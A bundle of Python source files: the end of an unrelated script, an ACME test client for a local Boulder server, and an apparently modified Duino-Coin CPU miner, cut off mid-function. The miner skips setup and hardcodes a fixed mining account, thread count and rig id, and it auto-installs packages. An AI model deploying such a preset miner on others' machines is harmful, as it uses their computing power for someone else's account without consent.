session.stop()
session.wait_for_stop(10)
# All of the preparations for shutting down must be completed before this command
# The last command is DBHandler.shutdown
run_on_exit(db.shutdown)
|
chisel.py
|
"""
A simple client that uses the Python ACME library to run a test issuance against
a local Boulder server. Usage:
$ virtualenv venv
$ . venv/bin/activate
$ pip install -r requirements.txt
$ python chisel.py foo.com bar.com
"""
import json
import logging
import os
import sys
import threading
import time
import urllib2
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import rsa
import OpenSSL
import josepy
from acme import challenges
from acme import client as acme_client
from acme import errors as acme_errors
from acme import messages
from acme import standalone
logger = logging.getLogger()
logging.basicConfig()
logger.setLevel(int(os.getenv('LOGLEVEL', 20)))
DIRECTORY = os.getenv('DIRECTORY', 'http://localhost:4000/directory')
# URLs to control dns-test-srv
SET_TXT = "http://localhost:8055/set-txt"
CLEAR_TXT = "http://localhost:8055/clear-txt"
os.environ.setdefault('REQUESTS_CA_BUNDLE', 'test/wfe-tls/minica.pem')
def make_client(email=None):
"""Build an acme.Client and register a new account with a random key."""
key = josepy.JWKRSA(key=rsa.generate_private_key(65537, 2048, default_backend()))
net = acme_client.ClientNetwork(key, user_agent="Boulder integration tester")
client = acme_client.Client(DIRECTORY, key=key, net=net)
account = client.register(messages.NewRegistration.from_data(email=email))
client.agree_to_tos(account)
client.account = account
return client
class NoClientError(ValueError):
"""
An error that occurs when no acme.Client is provided to a function that
requires one.
"""
pass
class EmailRequiredError(ValueError):
"""
An error that occurs when a None email is provided to update_email.
"""
def update_email(client, email):
"""
Use a provided acme.Client to update the client's account to the specified
email.
"""
if client is None:
raise NoClientError("update_email requires a valid acme.Client argument")
if email is None:
raise EmailRequiredError("update_email requires an email argument")
if not email.startswith("mailto:"):
email = "mailto:"+ email
acct = client.account
updatedAcct = acct.update(body=acct.body.update(contact=(email,)))
return client.update_registration(updatedAcct)
def get_chall(authz, typ):
for chall_body in authz.body.challenges:
if isinstance(chall_body.chall, typ):
return chall_body
raise Exception("No %s challenge found" % typ)
class ValidationError(Exception):
"""An error that occurs during challenge validation."""
def __init__(self, domain, problem_type, detail, *args, **kwargs):
self.domain = domain
self.problem_type = problem_type
self.detail = detail
def __str__(self):
return "%s: %s: %s" % (self.domain, self.problem_type, self.detail)
def issue(client, authzs, cert_output=None):
"""Given a list of authzs that are being processed by the server,
wait for them to be ready, then request issuance of a cert with a random
key for the given domains.
If cert_output is provided, write the cert as a PEM file to that path."""
domains = [authz.body.identifier.value for authz in authzs]
pkey = OpenSSL.crypto.PKey()
pkey.generate_key(OpenSSL.crypto.TYPE_RSA, 2048)
csr = OpenSSL.crypto.X509Req()
csr.add_extensions([
OpenSSL.crypto.X509Extension(
'subjectAltName',
critical=False,
value=', '.join('DNS:' + d for d in domains).encode()
),
])
csr.set_pubkey(pkey)
csr.set_version(2)
csr.sign(pkey, 'sha256')
cert_resource = None
try:
cert_resource, _ = client.poll_and_request_issuance(josepy.ComparableX509(csr), authzs)
except acme_errors.PollError as error:
# If we get a PollError, pick the first failed authz and turn it into a more
# useful ValidationError that contains details we can look for in tests.
for authz in error.updated:
updated_authz = json.loads(urllib2.urlopen(authz.uri).read())
domain = authz.body.identifier.value,
for c in updated_authz['challenges']:
if 'error' in c:
err = c['error']
raise ValidationError(domain, err['type'], err['detail'])
# If none of the authz's had an error, just re-raise.
raise
if cert_output is not None:
pem = OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM,
cert_resource.body)
with open(cert_output, 'w') as f:
f.write(pem)
return cert_resource
def http_01_answer(client, chall_body):
"""Return an HTTP01Resource to server in response to the given challenge."""
response, validation = chall_body.response_and_validation(client.key)
return standalone.HTTP01RequestHandler.HTTP01Resource(
chall=chall_body.chall, response=response,
validation=validation)
def do_dns_challenges(client, authzs):
cleanup_hosts = []
for a in authzs:
c = get_chall(a, challenges.DNS01)
name, value = (c.validation_domain_name(a.body.identifier.value),
c.validation(client.key))
cleanup_hosts.append(name)
urllib2.urlopen(SET_TXT,
data=json.dumps({
"host": name + ".",
"value": value,
})).read()
client.answer_challenge(c, c.response(client.key))
def cleanup():
for host in cleanup_hosts:
urllib2.urlopen(CLEAR_TXT,
data=json.dumps({
"host": host + ".",
})).read()
return cleanup
def do_http_challenges(client, authzs):
port = 5002
challs = [get_chall(a, challenges.HTTP01) for a in authzs]
answers = set([http_01_answer(client, c) for c in challs])
server = standalone.HTTP01Server(("", port), answers)
thread = threading.Thread(target=server.serve_forever)
thread.start()
# Loop until the HTTP01Server is ready.
while True:
try:
urllib2.urlopen("http://localhost:%d" % port)
break
except urllib2.URLError:
time.sleep(0.1)
for chall_body in challs:
client.answer_challenge(chall_body, chall_body.response(client.key))
def cleanup():
server.shutdown()
server.server_close()
thread.join()
return cleanup
def auth_and_issue(domains, chall_type="http-01", email=None, cert_output=None, client=None):
"""Make authzs for each of the given domains, set up a server to answer the
challenges in those authzs, tell the ACME server to validate the challenges,
then poll for the authzs to be ready and issue a cert."""
if client is None:
client = make_client(email)
authzs = [client.request_domain_challenges(d) for d in domains]
if chall_type == "http-01":
cleanup = do_http_challenges(client, authzs)
elif chall_type == "dns-01":
cleanup = do_dns_challenges(client, authzs)
else:
raise Exception("invalid challenge type %s" % chall_type)
try:
cert_resource = issue(client, authzs, cert_output)
client.fetch_chain(cert_resource)
return cert_resource, authzs
finally:
cleanup()
def expect_problem(problem_type, func):
"""Run a function. If it raises a ValidationError or messages.Error that
contains the given problem_type, return. If it raises no error or the wrong
error, raise an exception."""
ok = False
try:
func()
except ValidationError as e:
if e.problem_type == problem_type:
ok = True
else:
raise
except messages.Error as e:
if problem_type in e.__str__():
ok = True
else:
raise
if not ok:
raise Exception('Expected %s, got no error' % problem_type)
if __name__ == "__main__":
domains = sys.argv[1:]
if len(domains) == 0:
print __doc__
sys.exit(0)
try:
auth_and_issue(domains)
except messages.Error, e:
print e
sys.exit(1)
|
Minhacarteira.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Python PC Miner (v2.5.6)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from hashlib import sha1
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import environ as osenviron
from platform import machine as osprocessor
from os import path, system
from os import system as ossystem
from pathlib import Path
from platform import system as plsystem
from re import sub
from signal import SIGINT, signal
from socket import socket
from statistics import mean
from subprocess import DEVNULL, Popen, check_call
from threading import Thread as thrThread
from time import ctime, sleep, strptime, time
from multiprocessing import Lock
from random import choice
import pip
import select
thread_lock = Lock()
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
def now():
# Return datetime object
return datetime.now()
try:
# Check if cpuinfo is installed
import cpuinfo
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Cpuinfo is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"py-cpuinfo\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("py-cpuinfo")
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Requests is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "requests" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('requests')
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Colorama is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"colorama\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("colorama")
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Pypresence is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"pypresence\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("pypresence")
try:
# Check if xxhash is installed
import xxhash
xxhash_enabled = True
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Xxhash is not installed - "
+ "Xxhash support will be disabled")
xxhash_enabled = False
# Global variables
MINER_VER = "2.56" # Version number
NODE_ADDRESS = "server.duinocoin.com"
AVAILABLE_PORTS = [
2813, # PC (1)
2814, # PC (2)
2815, # PC (3)
2812, # Wallets, other miners
2811 # Legacy
]
SOC_TIMEOUT = 45 # Socket timeout
PERIODIC_REPORT_TIME = 60
RESOURCES_DIR = "PCMiner_" + str(MINER_VER) + "_resources"
donatorrunning = False
debug = "n"
discord_presence = "y"
rig_identiier = "None"
requested_diff = "NET"
algorithm = "DUCO-S1"
config = ConfigParser()
donation_level = 0
thread = []
totalhashrate_mean = []
mining_start_time = time()
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
mkdir(RESOURCES_DIR)
# Check if languages file exists
if not Path(RESOURCES_DIR + "/langs.json").is_file():
url = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
r = requests.get(url)
with open(RESOURCES_DIR + "/langs.json", "wb") as f:
f.write(r.content)
# Load language file
with open(RESOURCES_DIR + "/langs.json", "r", encoding="utf8") as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if plsystem() == "Darwin":
if getlocale()[0] is None:
setlocale(LC_ALL, "en_US.UTF-8")
# Check if miner is configured, if it isn't, autodetect language
try:
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("mt"):
lang = "maltese"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("pr"):
lang = "portugese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
elif locale.startswith("th"):
lang = "thai"
else:
lang = "english"
else:
# Read language variable from configfile
try:
config.read(RESOURCES_DIR + "/Miner_config.cfg")
lang = config["Duino-Coin-PC-Miner"]["language"]
except Exception:
# If it fails, fallback to english
lang = "english"
except:
lang = "english"
lang = "english"
def getString(string_name):
# Get string form language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def debug_output(text):
# Debug output
if debug == "y":
print(now().strftime(Style.DIM + "%H:%M:%S.%f ") + "DEBUG: " + text)
def title(title):
# disable window title setter when running with nohup
if osenviron.get('_') != '/usr/bin/nohup':
# Set window title
if osname == "nt":
# Windows systems
system("title " + title)
else:
# Most standard terminals
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def handler(signal_received, frame):
# SIGINT handler
if current_process().name == "MainProcess":
pretty_print(
"sys0",
getString("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ getString("goodbye"),
"warning")
try:
# Close previous socket connection (if any)
socket.close()
except Exception:
pass
_exit(0)
def calculate_uptime(start_time):
uptime = time() - start_time
if uptime <= 59:
return str(round(uptime)) + " seconds"
elif uptime == 60:
return str(round(uptime // 60)) + " minute"
elif uptime >= 60:
return str(round(uptime // 60)) + " minutes"
elif uptime == 3600:
return str(round(uptime // 3600)) + " hour"
elif uptime >= 3600:
return str(round(uptime // 3600)) + " hours"
def get_prefix(diff: int):
if diff >= 1000000000:
diff = str(round(diff / 1000000000)) + "G"
elif diff >= 1000000:
diff = str(round(diff / 1000000)) + "M"
elif diff >= 1000:
diff = str(round(diff / 1000)) + "k"
return str(diff)
# Enable signal handler
signal(SIGINT, handler)
def Greeting():
# Greeting message
global greeting
print(Style.RESET_ALL)
if requested_diff == "LOW":
diffName = getString("low_diff_short")
elif requested_diff == "MEDIUM":
diffName = getString("medium_diff_short")
else:
diffName = getString("net_diff_short")
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = getString("greeting_morning")
elif current_hour == 12:
greeting = getString("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = getString("greeting_afternoon")
elif current_hour >= 18:
greeting = getString("greeting_evening")
else:
greeting = getString("greeting_back")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Fore.YELLOW
+ Style.BRIGHT
+ getString("banner")
+ Style.RESET_ALL
+ Fore.MAGENTA
+ " (v"
+ str(MINER_VER)
+ ") "
+ Fore.RESET
+ "2019-2021")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.YELLOW
+ "https://github.com/revoxhere/duino-coin")
if lang != "english":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ lang.capitalize()
+ " translation: "
+ Fore.YELLOW
+ getString("translation_autor"))
try:
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ "CPU: "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(threadcount)
+ "x "
+ str(cpu["brand_raw"]))
except Exception as e:
debug_output("Error displaying CPU message: " + str(e))
if osname == "nt" or osname == "posix":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("donation_level")
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donation_level))
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("algorithm")
+ Style.BRIGHT
+ Fore.YELLOW
+ algorithm
+ " ⚙ "
+ diffName)
if rig_identiier != "None":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("rig_identifier")
+ Style.BRIGHT
+ Fore.YELLOW
+ rig_identiier)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ", "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ "!\n")
def loadConfig():
# Config loading section
global username
global efficiency
global donation_level
global debug
global threadcount
global requested_diff
global rig_identiier
global lang
global algorithm
global SOC_TIMEOUT
global discord_presence
global PERIODIC_REPORT_TIME
# Initial configuration
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
print(
Style.BRIGHT
+ getString("basic_config_tool")
+ RESOURCES_DIR
+ getString("edit_config_file_warning"))
print(
Style.RESET_ALL
+ getString("dont_have_account")
+ Fore.YELLOW
+ getString("wallet")
+ Fore.RESET
+ getString("register_warning"))
username = "blathcaio"
if xxhash_enabled:
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - DUCO-S1 ("
+ getString("recommended")
+ ")")
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - XXHASH")
algorithm = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_algorithm")
+ Fore.RESET
+ Style.BRIGHT)
else:
algorithm = "1"
efficiency = "95"
threadcount = "8"
requested_diff = "2"
rig_identiier = "Hello12h3"
donation_level = "0"
# Check wheter efficiency is correct
efficiency = sub(r"\D", "", efficiency)
if efficiency == "":
efficiency = 95
elif float(efficiency) > int(100):
efficiency = 100
elif float(efficiency) < int(1):
efficiency = 1
# Check wheter threadcount is correct
threadcount = sub(r"\D", "", threadcount)
if threadcount == "":
threadcount = cpu_count()
elif int(threadcount) > int(8):
threadcount = 8
print(
Style.RESET_ALL
+ Style.BRIGHT
+ getString("max_threads_notice"))
elif int(threadcount) < int(1):
threadcount = 1
# Check wheter algo setting is correct
if algorithm == "2":
algorithm = "XXHASH"
else:
algorithm = "DUCO-S1"
# Check wheter diff setting is correct
if requested_diff == "1":
requested_diff = "LOW"
elif requested_diff == "2":
requested_diff = "MEDIUM"
else:
requested_diff = "MEDIUM"
# Check wheter donation_level is correct
donation_level = sub(r"\D", "", donation_level)
if donation_level == "":
donation_level = 1
elif float(donation_level) > int(5):
donation_level = 5
elif float(donation_level) < int(0):
donation_level = 0
# Format data
config["Duino-Coin-PC-Miner"] = {
"username": username,
"efficiency": efficiency,
"threads": threadcount,
"requested_diff": requested_diff,
"donate": donation_level,
"identifier": rig_identiier,
"algorithm": algorithm,
"language": lang,
"debug": "n",
"soc_timeout": 45,
"periodic_report": 60,
"discord_presence": "y"
}
with open(RESOURCES_DIR + "/Miner_config.cfg", "w") as configfile:
config.write(configfile)
print(Style.RESET_ALL + getString("config_saved"))
else:
# If config already exists, load data from it
config.read(RESOURCES_DIR + "/Miner_config.cfg")
username = config["Duino-Coin-PC-Miner"]["username"]
efficiency = config["Duino-Coin-PC-Miner"]["efficiency"]
threadcount = config["Duino-Coin-PC-Miner"]["threads"]
requested_diff = config["Duino-Coin-PC-Miner"]["requested_diff"]
donation_level = config["Duino-Coin-PC-Miner"]["donate"]
algorithm = config["Duino-Coin-PC-Miner"]["algorithm"]
rig_identiier = config["Duino-Coin-PC-Miner"]["identifier"]
debug = config["Duino-Coin-PC-Miner"]["debug"]
SOC_TIMEOUT = int(config["Duino-Coin-PC-Miner"]["soc_timeout"])
discord_presence = config["Duino-Coin-PC-Miner"]["discord_presence"]
PERIODIC_REPORT_TIME = int(
config["Duino-Coin-PC-Miner"]["periodic_report"])
efficiency = (100 - float(efficiency)) * 0.01
def ducos1(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# DUCO-S1 algorithm
# Measure starting time
timeStart = time()
base_hash = sha1(str(lastBlockHash).encode('ascii'))
temp_hash = None
# Loop from 1 too 100*diff
for ducos1res in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1res % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
temp_hash = base_hash.copy()
temp_hash.update(str(ducos1res).encode('ascii'))
ducos1 = temp_hash.hexdigest()
# Check if result was found
if ducos1 == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1res / timeDelta
return [ducos1res, hashrate]
def ducos1xxh(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# XXHASH algorithm
# Measure starting time
timeStart = time()
# Loop from 1 too 100*diff
for ducos1xxres in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1xxres % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
ducos1xx = xxhash.xxh64(
str(lastBlockHash) + str(ducos1xxres), seed=2811)
ducos1xx = ducos1xx.hexdigest()
# Check if result was found
if ducos1xx == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1xxres / timeDelta
return [ducos1xxres, hashrate]
def Thread(
threadid: int,
accepted: int,
rejected: int,
requested_diff: str,
khashcount: int,
username: str,
efficiency: int,
rig_identiier: str,
algorithm: str,
hashrates_list,
totalhashrate_mean,
NODE_ADDRESS: str,
NODE_PORT: int):
# Mining section for every thread
start_time = time()
report_shares = 0
while True:
while True:
try:
retry_counter = 0
while True:
try:
if retry_counter >= 3:
debug_output(
'Error connecting after 3 retries, '
+ 'fetching new node IP')
NODE_ADDRESS, NODE_PORT = fetch_pools()
debug_output('Connecting to node ' +
str(NODE_ADDRESS) + ":" + str(NODE_PORT))
soc = socket()
soc.connect((str(NODE_ADDRESS), int(NODE_PORT)))
soc.settimeout(SOC_TIMEOUT)
server_version = soc.recv(100).decode()
if server_version:
break
except Exception as e:
retry_counter += 1
pretty_print("net0",
" Error connecting to mining node: "
+ str(e)
+ ", retrying in 5s",
"error")
sleep(5)
if threadid == 0:
soc.send(bytes("MOTD", encoding="utf8"))
motd = soc.recv(1024).decode().rstrip("\n")
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
" MOTD: "
+ Fore.RESET
+ Style.NORMAL
+ str(motd),
"success")
if threadid == 0:
if float(server_version) <= float(MINER_VER):
# Miner is up-to-date
pretty_print(
"net"
+ str(threadid),
getString("connected")
+ Fore.RESET
+ Style.NORMAL
+ getString("connected_server")
+ str(server_version)
+ ", node: "
+ str(NODE_ADDRESS)
+ ":"
+ str(NODE_PORT)
+ ")",
"success")
else:
# Miner is outdated
pretty_print(
"sys"
+ str(threadid),
getString("outdated_miner")
+ MINER_VER
+ ") -"
+ getString("server_is_on_version")
+ server_version
+ Style.NORMAL
+ Fore.RESET
+ getString("update_warning"),
"warning")
sleep(5)
break
except Exception as e:
# Socket connection error
pretty_print(
"net"
+ str(threadid),
getString("connecting_error")
+ Style.NORMAL
+ Fore.RESET
+ " (net err: "
+ str(e)
+ ")",
"error")
debug_output("Connection error: " + str(e))
sleep(10)
if algorithm == "XXHASH":
using_algo = getString("using_algo_xxh")
else:
using_algo = getString("using_algo")
pretty_print(
"sys"
+ str(threadid),
getString("mining_thread")
+ str(threadid)
+ getString("mining_thread_starting")
+ Style.NORMAL
+ Fore.RESET
+ using_algo
+ Fore.YELLOW
+ str(int(100 - efficiency * 100))
+ "% "
+ getString("efficiency"),
"success")
# Mining section
while True:
try:
while True:
# Ask the server for job
if algorithm == "XXHASH":
soc.sendall(bytes(
"JOBXX,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
else:
soc.sendall(bytes(
"JOB,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
# Retrieve work
job = soc.recv(128).decode().rstrip("\n")
job = job.split(",")
debug_output("Received: " + str(job))
try:
diff = int(job[2])
debug_output(str(threadid) +
"Correct job received")
break
except:
pretty_print("cpu" + str(threadid),
" Node message: "
+ job[1],
"warning")
sleep(3)
while True:
computetimeStart = time()
if algorithm == "XXHASH":
algo_back_color = Back.CYAN
result = ducos1xxh(job[0], job[1], diff, efficiency)
else:
algo_back_color = Back.YELLOW
result = ducos1(job[0], job[1], diff, efficiency)
computetimeStop = time()
computetime = computetimeStop - computetimeStart
debug_output("Thread "
+ str(threadid)
+ ": result found: "
+ str(result[0]))
# Convert to kH/s
threadhashcount = int(result[1] / 1000)
# Add this thread's hash counter
# to the global hashrate counter
hashrates_list[threadid] = threadhashcount
# Calculate total hashrate of all thrads
sharehashrate = 0
for thread in hashrates_list.keys():
sharehashrate += hashrates_list[thread]
totalhashrate_mean.append(sharehashrate)
# Get average from the last 20 hashrate measurements
totalhashrate = mean(totalhashrate_mean[-20:])
while True:
# Send result of hashing algorithm to the server
soc.sendall(bytes(
str(result[0])
+ ","
+ str(result[1])
+ ","
+ "Official PC Miner ("
+ str(algorithm)
+ ") v"
+ str(MINER_VER)
+ ","
+ str(rig_identiier),
encoding="utf8"))
responsetimetart = now()
feedback = soc.recv(64).decode().rstrip("\n")
responsetimestop = now()
ping = int((responsetimestop - responsetimetart
).microseconds / 1000)
debug_output("Thread "
+ str(threadid)
+ ": Feedback received: "
+ str(feedback)
+ " Ping: "
+ str(ping))
if totalhashrate > 800:
# Format hashcount to MH/s
formattedhashcount = str(
"%03.2f" % round(totalhashrate / 1000, 2)
+ " MH/s")
elif totalhashrate > 100:
# Format for >100 kH/s
formattedhashcount = str(
"%03.0f" % float(totalhashrate)
+ " kH/s")
else:
# Format for small hashrates
formattedhashcount = str(
"%02.1f" % float(totalhashrate)
+ " kH/s")
if (totalhashrate > 1500
and accepted.value % 50 == 0):
pretty_print("sys0",
" " +
getString("max_hashrate_notice"),
"warning")
diff = get_prefix(diff)
if feedback == "GOOD":
# If result was correct
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.GREEN
+ " ⛏"
+ getString("accepted")
+ Fore.RESET
+ str(int(accepted.value))
+ "/"
+ str(int(accepted.value + rejected.value))
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
elif feedback == "BLOCK":
# If block was found
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.CYAN
+ " ⛏"
+ getString("block_found")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
else:
# If result was incorrect
rejected.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Style.BRIGHT
+ Back.RESET
+ Fore.RED
+ " ✗"
+ getString("rejected")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
end_time = time()
elapsed_time = end_time - start_time
if (threadid == 0
and elapsed_time >= PERIODIC_REPORT_TIME):
report_shares = accepted.value - report_shares
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time,
end_time,
report_shares,
totalhashrate,
uptime)
start_time = time()
break
break
except Exception as e:
pretty_print(
"net"
+ str(threadid),
getString("error_while_mining")
+ Style.NORMAL
+ Fore.RESET
+ " (mining err: "
+ str(e)
+ ")",
"error")
debug_output("Error while mining: " + str(e))
sleep(5)
break
def periodic_report(start_time,
end_time,
shares,
hashrate,
uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
" Periodic mining report (BETA): "
+ Fore.RESET
+ Style.NORMAL
+ "\n\t\t‖ During the last "
+ str(seconds)
+ " seconds"
+ "\n\t\t‖ You've mined "
+ str(shares)
+ " shares ("
+ str(round(shares/seconds, 1))
+ " shares/s)"
+ "\n\t\t‖ With the hashrate of "
+ str(int(hashrate)) + " kH/s"
+ "\n\t\t‖ In this time period, you've solved "
+ str(int(hashrate*seconds))
+ " hashes"
+ "\n\t\t‖ Total miner uptime: "
+ str(uptime), "success")
def pretty_print(message_type, message, state):
# Prints colored output messages
# Usb/net/sys background
if message_type.startswith("net"):
background = Back.BLUE
elif message_type.startswith("cpu"):
background = Back.YELLOW
if message_type.startswith("sys"):
background = Back.GREEN
# Text color
if state == "success":
color = Fore.GREEN
elif state == "warning":
color = Fore.YELLOW
else:
color = Fore.RED
with thread_lock:
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ background
+ " "
+ message_type
+ " "
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
def initRichPresence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
debug_output("Discord rich presence initialized")
except Exception as e:
# Discord not launched
debug_output("Error launching Discord RPC thread: " + str(e))
def updateRichPresence():
# Update rich presence status
startTime = int(time())
while True:
try:
# Calculate average total hashrate with prefix
totalhashrate = mean(totalhashrate_mean[-20:])
if totalhashrate > 800:
totalhashrate = str(round(totalhashrate / 1000, 2)) + " MH/s"
else:
totalhashrate = str(round(totalhashrate, 1)) + " kH/s"
RPC.update(
details="Hashrate: " + str(totalhashrate),
start=startTime,
state="Acc. shares: "
+ str(accepted.value)
+ "/"
+ str(rejected.value + accepted.value),
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
debug_output("Rich presence updated")
except Exception as e:
# Discord not launched
